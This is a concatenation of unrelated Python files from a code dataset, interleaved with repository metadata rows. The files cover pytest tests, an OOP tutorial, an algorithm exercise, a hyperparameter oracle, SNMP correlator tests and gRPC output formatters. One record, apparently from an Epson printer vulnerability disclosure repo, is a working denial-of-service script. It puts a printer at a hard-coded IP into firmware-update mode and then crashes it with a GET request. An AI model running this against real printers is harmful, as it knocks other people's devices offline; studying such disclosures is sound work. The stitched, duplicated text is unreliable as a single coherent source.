from punch import file_configuration as fc
@pytest.fixture
def global_variables():
    """Global punch variables: a full serializer plus an extra 'mark' key."""
    return dict(
        serializer='{{ major }}.{{ minor }}.{{ patch }}',
        mark='just a mark',
    )
@pytest.fixture
def local_variables():
    """Per-file variables whose serializer should shadow the global one."""
    return dict(
        serializer='{{ major }}.{{ minor }}',
    )
@pytest.fixture
def file_configuration_dict():
    """Dict form of a file configuration, as read from a punch config file."""
    return dict(
        path='pkg/__init__.py',
        serializer='{{ major }}.{{ minor }}',
    )
def test_file_configuration_from_string_local_variables_take_precedence(
        local_variables, global_variables):
    """A local 'serializer' wins over the global one; other globals merge in."""
    config = fc.FileConfiguration(
        'pkg/__init__.py', local_variables, global_variables)

    assert config.path == 'pkg/__init__.py'
    assert config.config['serializer'] == '{{ major }}.{{ minor }}'
    assert config.config['mark'] == 'just a mark'
def test_file_configuration_from_string_can_include_global_variables(
        global_variables):
    """A GLOBALS.* placeholder in a local value expands to the global value."""
    overrides = {
        'serializer': '__version__ = {{GLOBALS.serializer}}'
    }
    config = fc.FileConfiguration(
        'pkg/__init__.py', overrides, global_variables)

    assert config.path == 'pkg/__init__.py'
    expected = '__version__ = {{ major }}.{{ minor }}.{{ patch }}'
    assert config.config['serializer'] == expected
    assert config.config['mark'] == 'just a mark'
def test_file_conf_fr_str_path_cannot_be_overridden_by_global_variables(
        local_variables, global_variables):
    """A 'path' key among the globals must not replace the explicit path."""
    global_variables['path'] = 'a/new/path'
    config = fc.FileConfiguration(
        'pkg/__init__.py', local_variables, global_variables)

    assert config.path == 'pkg/__init__.py'
def test_file_conf_fr_str_path_cannot_be_overridden_by_local_variables(
        local_variables, global_variables):
    """A 'path' key among the locals must not replace the explicit path."""
    local_variables['path'] = 'a/new/path'
    config = fc.FileConfiguration(
        'pkg/__init__.py', local_variables, global_variables)

    assert config.path == 'pkg/__init__.py'
def test_file_configuration_from_dict_local_variables_take_precedence(
        file_configuration_dict, global_variables):
    """from_dict(): dict-local values win, extra globals are merged in."""
    config = fc.FileConfiguration.from_dict(
        file_configuration_dict, global_variables)

    assert config.path == 'pkg/__init__.py'
    assert config.config['serializer'] == '{{ major }}.{{ minor }}'
    assert config.config['mark'] == 'just a mark'
def test_file_conf_fr_dict_path_cannot_be_overridden_by_global_variables(
        file_configuration_dict, global_variables):
    """from_dict(): a global 'path' must not override the dict's own path."""
    global_variables['path'] = 'a/new/path'
    config = fc.FileConfiguration.from_dict(
        file_configuration_dict, global_variables)

    assert config.path == 'pkg/__init__.py'
8ec8aa9f78ea04bedaeab8a98c76a25bdf0902ea | 1,584 | py | Python | 02. oop-instance-class-static-methods.py | surajitrana1985/python-oops | 08b93af2bb8bb32f85bb37c68c91aa30a8dbf7ad | [
"MIT"
] | null | null | null | 02. oop-instance-class-static-methods.py | surajitrana1985/python-oops | 08b93af2bb8bb32f85bb37c68c91aa30a8dbf7ad | [
"MIT"
] | null | null | null | 02. oop-instance-class-static-methods.py | surajitrana1985/python-oops | 08b93af2bb8bb32f85bb37c68c91aa30a8dbf7ad | [
"MIT"
] | null | null | null | import datetime
emp1 = Employee.from_string("Jason-Gibbs-jason.gibbs@hotmail.com-36000")
emp2 = Employee.from_string("Mason-Storm-mason.storm@gmail.com-45000")
emp3 = Employee.from_string("Kelvin-Hobbs-kelvin.hobbs@yahoomail.com-89000")
Employee.set_raise()
emp1.apply_raise()
emp2.apply_raise()
emp3.apply_raise()
print("Employee 1 fullname is:", emp1.get_full_name(), "created at", emp1.timestamp, "salary is $", float(emp1.pay))
print("Employee 2 fullname is:", emp2.get_full_name(), "created at", emp2.timestamp, "salary is $", float(emp2.pay))
print("Employee 3 fullname is:", emp3.get_full_name(), "created at", emp3.timestamp, "salary is $", float(emp3.pay))
| 29.886792 | 116 | 0.67803 | import datetime
class Employee:
    """Employee record demonstrating instance, class and static methods."""

    # Class-wide default raise multiplier applied by apply_raise().
    raise_pay = 1.04

    def __init__(self, first_name, last_name, email, pay):
        """Store the employee fields and stamp the creation time."""
        self.first_name = first_name
        self.last_name = last_name
        self.email = email
        self.pay = pay
        self.timestamp = Employee.get_timestamp()

    def get_full_name(self):
        """Return the employee's name as "First Last"."""
        return '{} {}'.format(self.first_name, self.last_name)

    def apply_raise(self):
        """Multiply pay by the current raise multiplier (pay becomes a float)."""
        self.pay = self.raise_pay * float(self.pay)

    @classmethod
    def from_string(cls, employee_str):
        """Alternate constructor parsing "First-Last-email-pay"."""
        fname, lname, email, pay = employee_str.split("-")
        return cls(fname, lname, email, pay)

    @classmethod
    def set_raise(cls, raise_pay=1.07):
        """Set the class-wide raise multiplier.

        Generalized: the previous hard-coded 1.07 is now the default, so
        existing ``Employee.set_raise()`` callers are unaffected.
        """
        cls.raise_pay = raise_pay

    @staticmethod
    def get_timestamp():
        """Return the current wall-clock datetime."""
        return datetime.datetime.now()
emp1 = Employee.from_string("Jason-Gibbs-jason.gibbs@hotmail.com-36000")
emp2 = Employee.from_string("Mason-Storm-mason.storm@gmail.com-45000")
emp3 = Employee.from_string("Kelvin-Hobbs-kelvin.hobbs@yahoomail.com-89000")
Employee.set_raise()
emp1.apply_raise()
emp2.apply_raise()
emp3.apply_raise()
print("Employee 1 fullname is:", emp1.get_full_name(), "created at", emp1.timestamp, "salary is $", float(emp1.pay))
print("Employee 2 fullname is:", emp2.get_full_name(), "created at", emp2.timestamp, "salary is $", float(emp2.pay))
print("Employee 3 fullname is:", emp3.get_full_name(), "created at", emp3.timestamp, "salary is $", float(emp3.pay))
| 507 | 382 | 23 |
98d9774606907256c71e47bc2d5cfa9e19d08a9f | 1,978 | py | Python | env/lib/python2.7/site-packages/future/tests/test_import_star.py | talishte/ctigre | 1da8e56e716d84cc3ad7773c52267d0d53bd0d04 | [
"BSD-2-Clause"
] | null | null | null | env/lib/python2.7/site-packages/future/tests/test_import_star.py | talishte/ctigre | 1da8e56e716d84cc3ad7773c52267d0d53bd0d04 | [
"BSD-2-Clause"
] | null | null | null | env/lib/python2.7/site-packages/future/tests/test_import_star.py | talishte/ctigre | 1da8e56e716d84cc3ad7773c52267d0d53bd0d04 | [
"BSD-2-Clause"
] | null | null | null | """
This tests whether
from future.builtins import *
works as expected:
- This should NOT introduce namespace pollution on Py3.
- On Python 2, this should not introduce any symbols that aren't in
__builtin__.
"""
from __future__ import absolute_import, print_function, unicode_literals
import copy
from future import utils
from future.tests.base import unittest
original_locals = set(copy.copy(locals()))
original_globals = set(copy.copy(globals()))
new_names = set(['original_locals', 'original_globals', 'new_names'])
from future.builtins import *
new_locals = set(copy.copy(locals())) - new_names - original_locals
new_globals = set(copy.copy(globals())) - new_names - original_globals - \
set(['new_locals'])
if __name__ == '__main__':
unittest.main()
| 29.522388 | 78 | 0.666835 | """
This tests whether
from future.builtins import *
works as expected:
- This should NOT introduce namespace pollution on Py3.
- On Python 2, this should not introduce any symbols that aren't in
__builtin__.
"""
from __future__ import absolute_import, print_function, unicode_literals
import copy
from future import utils
from future.tests.base import unittest
original_locals = set(copy.copy(locals()))
original_globals = set(copy.copy(globals()))
new_names = set(['original_locals', 'original_globals', 'new_names'])
from future.builtins import *
new_locals = set(copy.copy(locals())) - new_names - original_locals
new_globals = set(copy.copy(globals())) - new_names - original_globals - \
set(['new_locals'])
class TestImportStar(unittest.TestCase):
    """Checks on the namespace effects of ``from future.builtins import *``.

    Relies on the module-level snapshots (``new_locals``/``new_globals``)
    taken before and after the star import at module scope.
    """

    def test_namespace_pollution_locals(self):
        # On Py3 the star import must introduce no new local names.
        if utils.PY3:
            self.assertEqual(len(new_locals), 0,
                             'namespace pollution: {0}'.format(new_locals))
        else:
            pass # maybe check that no new symbols are introduced

    def test_namespace_pollution_globals(self):
        # Same check for module globals.
        if utils.PY3:
            self.assertEqual(len(new_globals), 0,
                             'namespace pollution: {0}'.format(new_globals))
        else:
            pass # maybe check that no new symbols are introduced

    def test_iterators(self):
        # future's range() is an iterator-like type, not Py2's list.
        self.assertNotEqual(type(range(10)), list)

    def test_super(self):
        pass

    def test_python3_stdlib_imports(self):
        # These should fail on Py2
        import queue
        import socketserver

    def test_str(self):
        self.assertIsNot(str, bytes) # Py2: assertIsNot only in 2.7
        self.assertEqual(str('blah'), u'blah') # Py3.3 and Py2 only

    def test_python_2_unicode_compatible_decorator(self):
        # This should not be in the namespace
        assert 'python_2_unicode_compatible' not in locals()
unittest.main()
| 957 | 19 | 211 |
a0d2e4380cddc23ff59fec189f236b132814990c | 1,155 | py | Python | algorithms/Arrays/closest3sum.py | gadodia/Algorithms | 714d43ce89b684d8e5c4bb77a654938957957f33 | [
"MIT"
] | null | null | null | algorithms/Arrays/closest3sum.py | gadodia/Algorithms | 714d43ce89b684d8e5c4bb77a654938957957f33 | [
"MIT"
] | null | null | null | algorithms/Arrays/closest3sum.py | gadodia/Algorithms | 714d43ce89b684d8e5c4bb77a654938957957f33 | [
"MIT"
] | null | null | null | import collections
'''
This problem was recently asked by Google:
Given a list of numbers and a target number n, find 3 numbers combinatins in the list that sums closest to the target number n. There may be multiple ways of creating the sum closest to the target number, you can return any combination in any order.
Time: O(nlogn) + O(n2) = O(n2)
Space: O(n)
'''
print(Solution().closest_3_sum([2, 1, -5, 4], -1))
# (1, [[-5, 1, 4], [-5, 1, 2]]) | 30.394737 | 249 | 0.54632 | import collections
'''
This problem was recently asked by Google:
Given a list of numbers and a target number n, find 3 numbers combinatins in the list that sums closest to the target number n. There may be multiple ways of creating the sum closest to the target number, you can return any combination in any order.
Time: O(nlogn) + O(n2) = O(n2)
Space: O(n)
'''
class Solution:
    """Closest-3-sum solver using a two-pointer sweep over sorted input."""

    def closest_3_sum(self, nums, target):
        """Return ``(best_distance, combos)`` for the triples summing closest
        to *target*, or ``None`` when *nums* is empty.

        Sorts *nums* in place.  ``combos`` lists every triple encountered at
        the best distance, in discovery order.
        """
        if not nums:
            return None

        combos_by_distance = collections.defaultdict(list)
        best = float("inf")
        nums.sort()
        size = len(nums)
        for first in range(size):
            lo, hi = first + 1, size - 1
            while lo < hi:
                total = nums[first] + nums[lo] + nums[hi]
                gap = abs(total - target)
                if gap <= best:
                    best = gap
                    combos_by_distance[best].append(
                        [nums[first], nums[lo], nums[hi]])
                if total > target:
                    hi -= 1
                else:
                    lo += 1
        return best, combos_by_distance.get(best)
print(Solution().closest_3_sum([2, 1, -5, 4], -1))
# (1, [[-5, 1, 4], [-5, 1, 2]]) | 659 | -6 | 50 |
be7c1bdbe72f5af36c98b4bdd62ae9afb152bdeb | 2,614 | py | Python | hyperparameter_tuner/oracle.py | aierh/autoML | 8e31966edf6de2c223d5eeb6cd4b4dbd6ddbbf77 | [
"MIT"
] | 185 | 2019-12-26T12:41:53.000Z | 2020-09-18T06:22:32.000Z | hyperparameter_tuner/oracle.py | aierh/autoML | 8e31966edf6de2c223d5eeb6cd4b4dbd6ddbbf77 | [
"MIT"
] | 8 | 2020-02-25T19:32:22.000Z | 2020-09-18T06:17:48.000Z | hyperparameter_tuner/oracle.py | aierh/autoML | 8e31966edf6de2c223d5eeb6cd4b4dbd6ddbbf77 | [
"MIT"
] | 27 | 2019-12-26T15:02:47.000Z | 2020-09-08T21:24:54.000Z | from .trial import generate_trial_id
import random
import hashlib
import pandas as pd
| 35.324324 | 83 | 0.572686 | from .trial import generate_trial_id
import random
import hashlib
import pandas as pd
class Oracle:
    """Random-search hyperparameter oracle.

    Samples unseen value combinations from ``space`` (a list of
    ``{'name': ..., 'values': [...]}`` axes) and tracks trials in
    ``self.trials``.  Early-stops once ``max_trials`` is reached or a
    recorded ``val_accuracy`` exceeds 0.998.
    """

    def __init__(self, space, max_epochs, max_trials=None):
        self.max_epochs = max_epochs
        self.space = space
        # trial_id -> {'hp_values': ..., 'metrics': ..., 'meta_checkpoint': ...}
        self.trials = {}
        # Hashes of value combinations already sampled (duplicate avoidance).
        self._tried_so_far = set()
        self.max_trials = max_trials
        # Set True once update_metrics() has run at least once — TODO confirm;
        # the flag is only read here, not written.
        self.are_metrics = False
        # Give up sampling after this many consecutive duplicate draws.
        self._max_collisions = 20

    def create_trial(self):
        """Create a new trial; return ``(trial_id, values, status)``.

        ``values`` is None and status 'STOPPED' when the budget is exhausted,
        accuracy is good enough, or only duplicates can be drawn.
        """
        trial_id = generate_trial_id()
        if self.are_metrics:
            df = pd.DataFrame(self.trials)
            # NOTE(review): assumes every recorded metrics dict has a
            # 'val_accuracy' key — confirm against update_metrics() callers.
            temp_df = df.loc['metrics'].dropna().apply(lambda x: x['val_accuracy'])
        if self.max_trials is not None and len(self.trials) >= self.max_trials:
            status = 'STOPPED'
            values = None
        elif self.are_metrics and temp_df.max() > 0.998:
            # Accuracy target reached; stop searching.
            status = 'STOPPED'
            values = None
        else:
            response = self._populate_space(trial_id)
            if response is None:
                # Collision limit hit — the space is (effectively) exhausted.
                status = 'STOPPED'
                values = None
            else:
                status = response['status']
                values = response['values'] if 'values' in response else None
        if values is not None:
            self.trials[trial_id] = {'hp_values': values}
        return trial_id, values, status

    def update_metrics(self, ongoing_trials):
        """Record metrics/checkpoints for each finished trial in *ongoing_trials*."""
        for trial_id, trial in ongoing_trials.items():
            self.trials[trial_id]['metrics'] = trial['metrics']
            self.trials[trial_id]['meta_checkpoint'] = trial['meta_checkpoint']

    def _populate_space(self, trial_id):
        """Draw a fresh random combination; None after too many duplicates."""
        collisions = 0
        while 1:
            # Generate a set of random values.
            values = {}
            for p in self.space:
                values[p['name']] = random.choice(p['values'])
            values_hash = self._compute_values_hash(values)
            if values_hash in self._tried_so_far:
                collisions += 1
                if collisions > self._max_collisions:
                    return None
                continue
            self._tried_so_far.add(values_hash)
            # Bookkeeping keys consumed by the tuner, not part of the space.
            values['hyperparameter_tuner/new_trial_id'] = trial_id
            values['hyperparameter_tuner/epochs'] = self.max_epochs
            values['hyperparameter_tuner/initial_epoch'] = 0
            break
        return {'status': 'RUNNING',
                'values': values}

    def _compute_values_hash(self, values):
        """Order-independent 32-hex-char fingerprint of a values dict."""
        keys = sorted(values.keys())
        s = ''.join(str(k) + '=' + str(values[k]) for k in keys)
        return hashlib.sha256(s.encode('utf-8')).hexdigest()[:32]
| 2,377 | -8 | 158 |
d3a5f9354952f5c8131ea23b89af9878604703b2 | 555 | py | Python | app/helpers/__init__.py | peterhil/ninhursag | 582133ae51e98b2e4272d6a78794b08aed845960 | [
"MIT"
] | 4 | 2015-05-24T20:39:54.000Z | 2021-06-23T06:48:23.000Z | app/helpers/__init__.py | peterhil/ninhursag | 582133ae51e98b2e4272d6a78794b08aed845960 | [
"MIT"
] | 10 | 2021-03-23T01:11:49.000Z | 2021-06-22T23:58:36.000Z | app/helpers/__init__.py | peterhil/ninhursag | 582133ae51e98b2e4272d6a78794b08aed845960 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# from flask_security import login_required
from functools import wraps
from .blueprints import register_blueprints
from .slugify import slugify
from app.settings import project_name
try: from instance.settings import project_name
except ImportError: pass
| 22.2 | 47 | 0.673874 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# from flask_security import login_required
from functools import wraps
from .blueprints import register_blueprints
from .slugify import slugify
from app.settings import project_name
try: from instance.settings import project_name
except ImportError: pass
def route(bp, *args, **kwargs):
    """Decorator factory that registers a view on blueprint *bp*.

    ``wrapper`` is what gets registered via ``bp.route`` (leaving room to
    layer in ``login_required`` here), but the decorator deliberately
    returns the original ``f`` so the module keeps an undecorated,
    directly-callable reference to the view function.
    """
    def decorator(f):
        @bp.route(*args, **kwargs)
        # @login_required
        @wraps(f)
        def wrapper(*args, **kwargs):
            return f(*args, **kwargs)
        return f
    return decorator
| 226 | 0 | 23 |
01cf8a14c4fab83d98f40dd99d9c64a350d27566 | 600 | py | Python | src/DoS/dos_firmware.py | bstnbuck/Epson-Printer-vulnerabilities | 9c9b88c3bf36472a3f805b42c30d95894e93c73f | [
"MIT"
] | 3 | 2021-11-09T16:10:46.000Z | 2022-01-18T16:40:37.000Z | src/DoS/dos_firmware.py | bstnbuck/Epson-Printer-vulnerabilities | 9c9b88c3bf36472a3f805b42c30d95894e93c73f | [
"MIT"
] | null | null | null | src/DoS/dos_firmware.py | bstnbuck/Epson-Printer-vulnerabilities | 9c9b88c3bf36472a3f805b42c30d95894e93c73f | [
"MIT"
] | null | null | null | import requests
if __name__ == '__main__':
main() | 26.086957 | 92 | 0.666667 | import requests
def requestFirmwareUpdate(host='141.87.29.101'):
    """Put the printer into firmware-update mode via GET /FIRMWAREUPDATE.

    Generalized: *host* is now a parameter; the default preserves the
    original hard-coded test-printer address.
    """
    url = 'http://{}/FIRMWAREUPDATE'.format(host)
    requests.get(url)
def triggerDos(host='141.87.29.101'):
    """Trigger the DoS by issuing GET (instead of POST) to the upload URL.

    Generalized: *host* is a parameter defaulting to the original address.
    The bare ``except`` is narrowed to requests' exception base so real
    programming errors are no longer silently swallowed.
    """
    url = 'http://{}/DOWN/FIRMWAREUPDATE/ROM1'.format(host)
    try:
        # epson printer receives the firmware file via `post`; a `get` on the
        # same URL triggers the DoS.
        requests.get(url, timeout=5)
    except requests.exceptions.RequestException:
        # Best effort: the wedged device may reset the connection or time out.
        pass
def main():
    """Run the full PoC: enter firmware-update mode, then trigger the DoS."""
    # Request firmware-update mode: the printer gets ready to receive a firmware file.
    requestFirmwareUpdate()
    # Issuing GET (not POST) against the upload URL causes the DoS.
    triggerDos()
if __name__ == '__main__':
main() | 477 | 0 | 69 |
f6532607c371bb53057566607b9bfbeaf107127d | 1,084 | py | Python | homeworkpal_project/maximo/migrations/0002_datadocument.py | luiscberrocal/homeworkpal | 342acf876264fade818b107f4af13cac067f1ace | [
"MIT"
] | null | null | null | homeworkpal_project/maximo/migrations/0002_datadocument.py | luiscberrocal/homeworkpal | 342acf876264fade818b107f4af13cac067f1ace | [
"MIT"
] | null | null | null | homeworkpal_project/maximo/migrations/0002_datadocument.py | luiscberrocal/homeworkpal | 342acf876264fade818b107f4af13cac067f1ace | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import model_utils.fields
import django.utils.timezone
| 34.967742 | 147 | 0.610701 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import model_utils.fields
import django.utils.timezone
class Migration(migrations.Migration):
    """Create the ``DataDocument`` model for uploaded maximo data files."""

    dependencies = [
        ('maximo', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='DataDocument',
            fields=[
                ('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),
                # created/modified are auto-maintained by django-model-utils.
                ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),
                ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),
                # Uploads are sharded into date-based directories.
                ('docfile', models.FileField(upload_to='maximo_documents/%Y/%m/%d')),
                ('processed', models.DateTimeField()),
                ('extension', models.CharField(max_length=5)),
            ],
            options={
                'abstract': False,
            },
        ),
    ]
| 0 | 899 | 23 |
256033a277a7efd83c664f7091741ead5c4842a3 | 137 | py | Python | tests/test_app.py | aracnid/i-xero2 | 449bb8bccb9e76935cedc49eff776bb8804d756b | [
"MIT"
] | null | null | null | tests/test_app.py | aracnid/i-xero2 | 449bb8bccb9e76935cedc49eff776bb8804d756b | [
"MIT"
] | null | null | null | tests/test_app.py | aracnid/i-xero2 | 449bb8bccb9e76935cedc49eff776bb8804d756b | [
"MIT"
] | null | null | null | """Application tests.
"""
import i_xero2
def test_version():
"""Test the version of the app.
"""
assert i_xero2.__version__
| 15.222222 | 35 | 0.656934 | """Application tests.
"""
import i_xero2
def test_version():
"""Test the version of the app.
"""
assert i_xero2.__version__
| 0 | 0 | 0 |
e9ca1648d91deb910529ad55e8d5f08e7de02539 | 5,687 | py | Python | esmond/api/tests/test_correlator.py | esnet/esmond-test | 8aaec580e8fa8a27bddddc0fd91fd3e96730515f | [
"BSD-3-Clause-LBNL"
] | null | null | null | esmond/api/tests/test_correlator.py | esnet/esmond-test | 8aaec580e8fa8a27bddddc0fd91fd3e96730515f | [
"BSD-3-Clause-LBNL"
] | null | null | null | esmond/api/tests/test_correlator.py | esnet/esmond-test | 8aaec580e8fa8a27bddddc0fd91fd3e96730515f | [
"BSD-3-Clause-LBNL"
] | null | null | null | from django.test import TestCase
from esmond.poll import IfDescrCorrelator, JnxFirewallCorrelator, \
JnxCOSCorrelator, SentryCorrelator, \
ALUSAPCorrelator
#def test_jnx_cos_correlator():
# s = MockSession()
# c = JnxCOSCorrelator(s)
# c.setup()
# for (var,val,check) in s.walk('jnxCosIfqQedBytes'):
# assert check == c.lookup('jnxCosIfqQedBytes', var)
| 45.496 | 90 | 0.495516 | from django.test import TestCase
from esmond.poll import IfDescrCorrelator, JnxFirewallCorrelator, \
JnxCOSCorrelator, SentryCorrelator, \
ALUSAPCorrelator
class MockSession(object):
    """Canned SNMP session: ``walk`` returns fixed rows per OID name.

    Each row is ``(var, value[, expected_correlation])``; unknown OIDs
    implicitly return ``None``.  Bug fix: the Python 2 long literal ``0L``
    (a SyntaxError on Python 3) is replaced by ``0`` — identical value.
    """

    def walk(self, oid):
        if oid == 'ifDescr':
            return (('ifDescr.115', 'ae0'),
                    ('ifDescr.116', 'ge-1/0/0'),
                    ('ifDescr.117', ''))
        if oid == 'ifAlias':
            return (('ifAlias.115', 'ae0'),
                    ('ifAlias.116', 'ge-1/0/0'),
                    ('ifAlias.117', ''))
        elif oid == 'ifHCInOctets':
            return (('ifHCInOctets.115', '0', ['ifHCInOctets', 'ae0']),
                    ('ifHCInOctets.116', '732401229666', ['ifHCInOctets', 'ge-1/0/0']),
                    ('ifHCInOctets.117', '732401229666', None))
        elif oid == 'jnxCosIfqQedBytes':
            return (('jnxCosIfqQedBytes.116."best-effort"', '2091263919975',
                     ["ge-1/0/0", "jnxCosIfqQedBytes", "best-effort"]),
                    ('jnxCosIfqQedBytes.116."network-control"', '325426106',
                     ["ge-1/0/0", "jnxCosIfqQedBytes", "network-control"]),
                    ('jnxCosIfqQedBytes.116."scavenger-service"', '17688108277',
                     ["ge-1/0/0", "jnxCosIfqQedBytes", "scavenger-service"]),
                    ('jnxCosIfqQedBytes.116."expedited-forwarding"', '1026807',
                     ["ge-1/0/0", "jnxCosIfqQedBytes", "expedited-forwarding"]),
                    ('jnxCosIfqQedBytes.117."best-effort"', '2091263919975',
                     None),
                    ('jnxCosIfqQedBytes.117."network-control"', '325426106',
                     None),
                    ('jnxCosIfqQedBytes.117."scavenger-service"', '17688108277',
                     None),
                    ('jnxCosIfqQedBytes.117."expedited-forwarding"', '1026807',
                     None))
        elif oid == 'jnxFWCounterByteCount':
            return (('jnxFWCounterByteCount."fnal-test"."fnal".counter',
                     '0', ["counter", "fnal-test", "fnal"]),
                    ('jnxFWCounterByteCount."fnal-test"."discard".counter',
                     '0', ["counter", "fnal-test", "discard"]),
                    ('jnxFWCounterByteCount."test-from-eqx"."from-eqx".counter',
                     '0', ["counter", "test-from-eqx", "from-eqx"]))
        elif oid == 'outletID':
            return (
                ('outletID.1.1.1', 'AA1'),
                ('outletID.1.1.2', 'AA2'),
            )
        elif oid == 'outletLoadValue':
            return (
                ('outletLoadValue.1.1.1', '0',
                 ["outletLoadValue", "AA1"]),
                ('outletLoadValue.1.1.2', '0',
                 ["outletLoadValue", "AA2"]),
            )
        elif oid == 'tempHumidSensorID':
            return (
                ('tempHumidSensorID.1.1', 'A1'),
                ('tempHumidSensorID.1.2', 'A2'),
            )
        elif oid == 'tempHumidSensorTempValue':
            return (
                ('tempHumidSensorTempValue.1.1', '780',
                 ["tempHumidSensorTempValue", "A1"]),
                ('tempHumidSensorTempValue.1.2', '735',
                 ["tempHumidSensorTempValue", "A2"]),
            )
        elif oid == 'tempHumidSensorHumidValue':
            return (
                ('tempHumidSensorHumidValue.1.1', '38',
                 ["tempHumidSensorHumidValue", "A1"]),
                ('tempHumidSensorHumidValue.1.2', '47',
                 ["tempHumidSensorHumidValue", "A2"]),
            )
        elif oid == 'outletName':
            return (
                ('outletName.1.1.1', 'TowerA_InfeedA_Outlet1', ["outletName", "AA1"]),
                ('outletName.1.1.2', 'TowerA_InfeedA_Outlet2', ["outletName", "AA2"]),
            )
        elif oid == 'sapBaseStatsEgressQchipForwardedOutProfOctets':
            return (
                ('sapBaseStatsEgressQchipForwardedOutProfOctets.834.102793216.834',
                 0,
                 ["sapBaseStatsEgressQchipForwardedOutProfOctets",
                  "834-3/1/1-834"]),
                )
class MockOID(object):
    """Minimal stand-in for an SNMP OID object: carries only a name."""

    def __init__(self, name):
        self.name = name

    def __repr__(self):
        return "MockOID('%s')" % self.name
class TestCorrelators(TestCase):
    """Drive each poller correlator against the canned MockSession data."""

    def test_correlators(self):
        # For every correlator, feed it the walk() rows for its declared OIDs,
        # then check lookup() reproduces the expected correlation of each row.
        for (correlator, oid) in (
                (IfDescrCorrelator, MockOID('ifHCInOctets')),
                (JnxFirewallCorrelator, MockOID('jnxFWCounterByteCount')),
                (JnxCOSCorrelator, MockOID('jnxCosIfqQedBytes')),
                (SentryCorrelator, MockOID('outletLoadValue')),
                (SentryCorrelator, MockOID('tempHumidSensorTempValue')),
                (SentryCorrelator, MockOID('tempHumidSensorHumidValue')),
                (SentryCorrelator, MockOID('outletName')),
                (ALUSAPCorrelator, MockOID('sapBaseStatsEgressQchipForwardedOutProfOctets')),
                ):
            s = MockSession()
            c = correlator()
            setup_data = []
            for oid_name in c.oids:
                setup_data.extend(s.walk(oid_name))
            c.setup(setup_data)
            # Third element of each walk row is the expected lookup result.
            for (var,val,check) in s.walk(oid.name):
                self.assertEqual(check, c.lookup(oid, var))
#def test_jnx_cos_correlator():
# s = MockSession()
# c = JnxCOSCorrelator(s)
# c.setup()
# for (var,val,check) in s.walk('jnxCosIfqQedBytes'):
# assert check == c.lookup('jnxCosIfqQedBytes', var)
| 5,066 | 17 | 173 |
ef83386aa4f0d57c0d5a33e9362aa865c04a2323 | 3,836 | py | Python | test/harness/VerboseOutput.py | adamrehn/language-toolbox | f86c39784b2a6952719afdd7c3769a6a6b5f2630 | [
"MIT"
] | 2 | 2018-12-18T07:53:06.000Z | 2020-02-28T11:13:21.000Z | test/harness/VerboseOutput.py | adamrehn/language-toolbox | f86c39784b2a6952719afdd7c3769a6a6b5f2630 | [
"MIT"
] | null | null | null | test/harness/VerboseOutput.py | adamrehn/language-toolbox | f86c39784b2a6952719afdd7c3769a6a6b5f2630 | [
"MIT"
] | null | null | null | from . import common_pb2 as common_messages
from contextlib import redirect_stdout
from .Utility import Utility
import json, io
| 31.186992 | 119 | 0.703858 | from . import common_pb2 as common_messages
from contextlib import redirect_stdout
from .Utility import Utility
import json, io
class VerboseOutput:
    """Formatters turning RPC response messages into printable report strings.

    Each public method builds its report by printing into an in-memory buffer
    (via ``redirect_stdout``) and returning the captured, stripped text.
    """

    @staticmethod
    def _extractCapabilities(capabilities):
        '''
        Extracts the list of capabilities from the LanguageCapabilities message bitfield
        '''
        capabilitiesDict = dict(common_messages.Capabilities.items())
        return Utility.extractFlags(capabilities, capabilitiesDict)

    @staticmethod
    def _stringifyTestCaseResult(result):
        '''
        Returns a string representation of a TestCaseResult object
        '''
        return json.dumps({
            "output": result.output,
            "type": result.type,
            "exception": result.exception
        })

    @staticmethod
    def ListCapabilities(response):
        '''
        Verbose output printer for ListCapabilities() RPC results
        '''
        buf = io.StringIO()
        with redirect_stdout(buf):
            print('Server capabilities:')
            for item in response.capabilities:
                capabilitiesList = ', '.join(VerboseOutput._extractCapabilities(item.capabilities))
                print('\t{} ({})'.format(item.language, capabilitiesList))
        return buf.getvalue().strip()

    @staticmethod
    def GenerateAst(response):
        '''
        Verbose output printer for GenerateAst() RPC results
        '''
        buf = io.StringIO()
        with redirect_stdout(buf):
            print('Generate AST results:')
            print('\tError: {}'.format(response.error))
            print('\tAST: {}'.format(response.ast))
        return buf.getvalue().strip()

    @staticmethod
    def PerformAstMatch(response):
        '''
        Verbose output printer for PerformAstMatch() RPC results
        '''
        buf = io.StringIO()
        with redirect_stdout(buf):
            print('Perform AST Match results:')
            print('\tError: {}'.format(response.error))
            print('\tAST: {}'.format(response.ast))
            print('\tMatches: {}'.format(response.matches))
        return buf.getvalue().strip()

    @staticmethod
    def PerformIOMatch(response):
        '''
        Verbose output printer for PerformIOMatch() RPC results
        '''
        buf = io.StringIO()
        with redirect_stdout(buf):
            print('Perform I/O Matching results:')
            print('\tError: {}'.format(response.error))
            print('\tstdout: {}'.format(response.stdout))
            print('\tstderr: {}'.format(response.stderr))
            print('\tStdout Matches: {}'.format(response.matchesStdOut))
            print('\tStderr Matches: {}'.format(response.matchesStdErr))
        return buf.getvalue().strip()

    @staticmethod
    def PerformCompoundIOMatch(response):
        '''
        Verbose output printer for PerformCompoundIOMatch() RPC results
        '''
        buf = io.StringIO()
        with redirect_stdout(buf):
            print('Perform compound I/O Matching results:')
            print('\tError: {}'.format(response.error))
            print('\tResults:\n')
        # Header text followed by one PerformIOMatch report per sub-result.
        return buf.getvalue() + '\n'.join([VerboseOutput.PerformIOMatch(result) for result in response.results])

    @staticmethod
    def PerformUnitTests(response):
        '''
        Verbose output printer for PerformUnitTests() RPC results
        '''
        buf = io.StringIO()
        with redirect_stdout(buf):
            print('Unit test results:')
            print('\tError: {}'.format(response.error))
            print('\tPassed: {}'.format(response.passed))
            print('\tFailed: {}'.format(response.failed))
            print('\tPass/fail vectors:')
            for vec in response.results:
                print('\t\t[{}]'.format(','.join([str(passed) for passed in vec.passed])))
            print('\tResult vectors:')
            for vec in response.results:
                # Each test-case result is serialized to JSON for readability.
